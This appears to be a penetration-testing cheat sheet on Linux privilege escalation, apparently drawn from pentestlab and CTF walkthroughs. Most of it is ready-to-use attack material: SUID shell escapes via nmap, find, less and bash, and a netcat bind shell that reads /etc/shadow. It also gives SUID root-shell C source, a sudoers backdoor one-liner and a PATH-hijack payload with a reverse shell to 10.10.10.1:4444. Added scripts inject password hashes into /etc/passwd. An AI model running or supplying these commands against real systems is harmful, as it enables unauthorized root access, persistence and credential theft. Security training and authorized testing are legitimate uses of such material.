Privilege Escalation Through SUID Executables
Reference: https://pentestlab.blog/2017/09/25/suid-executables/
The following commands list every SUID executable present on the system (the bit is set on the file, whether or not the program is currently running):
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
Discovery of SUID Executables
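The two find commands above give you the full list; the step a practitioner actually wants next is to pull out the binaries that are known to hand out a shell. The script below is an added example, not code from the page or from pentestlab: it wraps the same find invocation and filters the output against a constructed starting list of shell-spawning programs (KNOWN_SHELL_SPAWNERS is an assumption, not an exhaustive list).

```shell
#!/bin/sh
# Added example (not from the original page): enumerate SUID/SGID binaries and
# flag the ones whose basename belongs to a program known to hand out a shell
# when it runs with elevated privileges. KNOWN_SHELL_SPAWNERS is a constructed
# starting list, not an exhaustive one; grow it as you learn new ones.

KNOWN_SHELL_SPAWNERS="bash sh dash zsh find nmap less more vim vi nano python python3 perl ruby awk gawk env tar cp mv"

# Read one path per line on stdin, print only those whose basename is in the list.
flag_dangerous_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        base=${path##*/}
        for name in $KNOWN_SHELL_SPAWNERS; do
            if [ "$base" = "$name" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Live enumeration: every regular file with the setuid (4000) or setgid (2000) bit.
# Permission errors on unreadable directories are silenced, as on the page.
enumerate_setid() {
    find / -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Run with --live on a target: full list to a file, suspicious subset on stdout.
if [ "${1:-}" = "--live" ]; then
    enumerate_setid | tee /tmp/setid_all.txt | flag_dangerous_suid
fi
```

Run it as `sh suid_triage.sh --live` on the target. Anything it flags still needs `ls -l` to confirm the owner is root (an SGID hit owned by a low-value group is rarely useful) before you reach for the tricks that follow.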
- Privilege escalation with nmap
Interactive mode only exists in nmap 2.02 through 5.21, so check the version first. Run nmap directly if it is SUID, or prefix sudo if sudo -l allows it:
nmap -V
nmap --interactive
nmap> !sh
sh-3.2# whoami
root
- Metasploit Module for nmap privilege escalation
exploit/unix/local/setuid_nmap
- Privilege escalation with Find & Permission
If find is SUID, everything it runs through -exec inherits root. Confirm that first, then bind a shell:
touch pentestlab
find pentestlab -exec whoami \;
find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
Connecting to the opened port gives a root shell (the -e option needs a netcat build that supports it, such as netcat-traditional):
netcat 192.168.1.189 5555
id
cat /etc/shadow
- Privilege escalation with Bash & Permission
A SUID copy of bash must be started with -p. Without it bash notices that the effective UID differs from the real UID and drops back to the real one at startup, so the setuid bit is silently thrown away (the same applies to any SUID program that calls system("/bin/bash") without first setting the real UID):
bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
- Privilege escalation with LESS & Permission
The less utility can also execute an elevated shell; the same principle applies to more. Open any file, then type a shell escape at the prompt:
less /etc/passwd
!/bin/sh
What services are running as root?
ps aux | grep root
Check which users you can switch to via sudo without a password (sudo -l lists them), then run a shell as that user:
sudo -u qwesi /bin/bash ----> where qwesi is a user that sudo -l shows with NOPASSWD
sudo su - www-data -s /bin/bash
Run a command as a user other than root:
sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf
Add a user or change a password (passwd --stdin exists on Red Hat-derived systems only):
/usr/sbin/useradd -p "$(openssl passwd -1 thePassword)" haxzor
echo thePassword | passwd haxzor --stdin
Local Privilege Escalation Exploit in Linux
SUID (Set owner User ID up on execution)
Often SUID C binaries are needed to spawn a shell as the superuser; adjust the UID/GID and the shell as required. The binary only becomes useful once something running as root has done chown root and chmod u+s on it. Below are quick copy-and-paste examples for various shells.
SUID C shell for /bin/bash:
#define _GNU_SOURCE   /* setresuid() needs this on glibc */
#include <stdlib.h>
#include <unistd.h>
/* set real, effective and saved UID to 0 so the child shell keeps root */
int main(void){ setresuid(0, 0, 0); system("/bin/bash"); return 0; }
SUID C shell for /bin/sh:
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void){ setresuid(0, 0, 0); system("/bin/sh"); return 0; }
Building the SUID shell binary:
gcc -o suid suid.c
For 32 bit:
gcc -m32 -o suid suid.c
Create and compile a SUID shell from a limited shell (no file transfer). printf is used rather than echo because echo only interprets \n in some shells, and a literal \n in C source will not compile:
printf '#include <stdlib.h>\n#include <unistd.h>\nint main(void){ setgid(0); setuid(0); system("/bin/sh"); return 0; }\n' > privsc.c
gcc privsc.c -o privsc
Handy command if you can get a root user to run it. It appends a sudoers entry that lets www-data run anything via sudo without a password (it does not touch group membership); verify afterwards with sudo -l as www-data:
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
You may find a command is being executed by the root user. If it is invoked by bare name and the root process inherits your PATH, you can put a directory you control first in PATH so your program runs instead. This only works when the caller does not reset PATH (cron jobs get a minimal fixed PATH unless the crontab sets one, and sudo replaces PATH with secure_path). In the example below, ssh is replaced with a reverse shell connecting to 10.10.10.1 on port 4444:
export PATH="/tmp:/usr/local/bin:/usr/bin:/bin"
printf '#!/bin/sh\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f\n' > /tmp/ssh
chmod +x /tmp/ssh
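To see the hijack and its defence side by side without touching a real target, the following added example (not from the original page) builds a throwaway victim script that calls a command by bare name, plants a fake in front of it, and then runs the same victim with the fixed PATH that cron and sudo's secure_path impose. The victim script, the choice of `id` as the hijacked command (instead of the page's ssh) and the HIJACKED marker are all constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the original page): PATH hijacking of a script that
# invokes a command by bare name, next to the fixed-PATH invocation that
# defeats it. The victim script, the hijacked command ("id" instead of the
# page's ssh) and the HIJACKED marker are constructed for the demo.

WORK=$(mktemp -d)

# Victim: a script of the kind a root cron job might run; it calls `id`
# without an absolute path, so PATH decides which `id` executes.
cat > "$WORK/victim.sh" <<'EOF'
#!/bin/sh
id
EOF

# Attacker-controlled directory with a fake `id` dropped in front of the real one.
mkdir -p "$WORK/evil"
cat > "$WORK/evil/id" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
chmod +x "$WORK/evil/id"

# Hijacked run: the attacker's directory is prepended to the inherited PATH,
# exactly what `export PATH="/tmp:$PATH"` does on the page.
run_hijacked() {
    PATH="$WORK/evil:$PATH" sh "$WORK/victim.sh"
}

# Hardened run: cron and sudo (secure_path) hand the child a fixed PATH that
# the caller cannot influence, so the bare `id` resolves to the system binary.
run_hardened() {
    env -i PATH=/usr/bin:/bin sh "$WORK/victim.sh"
}

cleanup() {
    rm -rf "$WORK"
}

# Stand-alone demo: first line prints HIJACKED, second prints the real uid=... line.
if [ "${1:-}" = "--demo" ]; then
    run_hijacked
    run_hardened
    cleanup
fi
```

Run it with `sh path_hijack.sh --demo`. The practical check on a target is the same comparison: look at how the root process is started (crontab, systemd unit, sudo rule) and whether PATH is set or inherited there; if it is reset, bare-name hijacking is dead and you need a writable directory that is already on that fixed PATH.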
SearchSploit
searchsploit -u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
searchsploit slmail
Kernel exploit suggestions for kernel version 3.0.0:
perl /usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0
Precompiled Linux kernel exploits: super handy if GCC is not installed on the target machine.
Collect the root password hash for offline cracking (readable only once you have root, or when /etc/shadow is mis-permissioned):
grep root /etc/shadow
Find and display the proof.txt or flag.txt - LOOT!
cat `find / -name proof.txt -print`
Setting a password for a user through the /etc/passwd file. This works when /etc/passwd is writable by you: a hash placed in the second field takes precedence over the x that points at /etc/shadow. The hash below is md5crypt ($1$) with the salt "salt", the format openssl passwd -1 -salt salt <password> produces:
$1$salt$bvDqL29IXg3sPhjeBKC/./
cp /etc/passwd /tmp/passwd
sed -i -e 's/taviso:x:/taviso:$1$salt$bvDqL29IXg3sPhjeBKC\/.\/:/g' /tmp/passwd
cp /tmp/passwd /etc/passwd
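The sed one-liner above works but is easy to get wrong because the hash contains the sed delimiter. The script below is an added example, not code from the page or the walkthrough it quotes: it wraps the same replacement in a function that escapes the hash, touches only the named user's line, and checks the result; the sample passwd content is constructed, and the hash reused is the page's own.

```shell
#!/bin/sh
# Added example (not from the original page): put a password hash of your
# choosing into the second field of a user's /etc/passwd line. The sample
# passwd content below is constructed; the hash is the one used on the page
# ($1$ = md5crypt, salt "salt"). Regenerate your own with
#   openssl passwd -1 -salt salt 'yourpassword'

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
taviso:x:1000:1000:taviso,,,:/home/taviso:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin'

# inject_hash USER HASH FILE: replace the "x" in USER's password field with HASH.
# Only the line whose first field is USER changes; the file is rewritten via a
# temp copy, so this works the same on /etc/passwd as on a scratch copy.
inject_hash() {
    user=$1; hash=$2; file=$3
    # In sed replacement text & and \ are special and / is our delimiter;
    # escape all three, since every crypt hash contains "/" ("$" is harmless).
    esc=$(printf '%s' "$hash" | sed 's/[&/\]/\\&/g')
    sed -e "s/^$user:x:/$user:$esc:/" "$file" > "$file.tmp" && mv "$file.tmp" "$file"
}

# password_field USER FILE: print the second field of USER's line.
password_field() {
    awk -F: -v u="$1" '$1 == u { print $2 }' "$2"
}

# is_writable FILE: succeeds when the current user may write it, which is the
# misconfiguration this whole trick depends on.
is_writable() {
    [ -w "$1" ]
}

# Stand-alone demo on a scratch copy; never touches the real /etc/passwd.
if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
    inject_hash taviso '$1$salt$bvDqL29IXg3sPhjeBKC/./' "$tmp"
    grep '^taviso:' "$tmp"
    rm -f "$tmp"
fi
```

Before trying this for real, `is_writable /etc/passwd` (or simply `ls -l /etc/passwd`) tells you whether the file is actually writable by your user; if it is not, nothing here applies and you are back to the SUID and sudo routes above.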
python3 -c 'import pty; pty.spawn("/bin/bash");'
www-data@hackday:/$ su taviso
Password: letmein
I'll admit - I had no idea you could specify an account password in the /etc/passwd file. Every day is a school day!